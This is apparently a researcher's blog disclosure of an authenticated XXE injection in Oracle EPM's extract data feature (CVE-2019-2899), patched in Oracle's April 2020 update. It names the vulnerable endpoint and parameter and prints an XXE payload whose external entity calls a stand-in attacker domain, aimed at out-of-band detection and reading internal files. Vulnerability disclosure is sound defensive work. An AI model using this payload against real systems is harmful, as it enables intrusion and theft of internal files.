Oracle EPM Authenticated XXE Injection (CVE-2019-2899)

This is a vulnerability which i discovered in a penetration test activity, the extract data feature in the Oracle EPM is vulnerable to XXE injection.
when trying to extract data from oracle EPM a request is generated to the following url:
https://<oracle epm>/hfmadf/faces/hfm.jspx
By injecting one of the request parameters called
Content-Disposition: form-data; name=”event.pt1:rgnTb2:1:pt1:pc1:t1:0:cil1″
with an xxe payload like the following:

<?xml version=”1.0″ ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM “http://<any key word>.attacker.domain”> %ext;
]>
<r></r>

a DNS query should appear in your domain DNS logs, successful exploitation should allow reading internal files if an attacker web server is accessible by the oracle EPM server.

Vulnerability fixed by oracle in CpuApr2020 and assigned CVE-2019-2899
https://www.oracle.com/security-alerts/cpuapr2020.html


Leave a Reply

Your email address will not be published. Required fields are marked *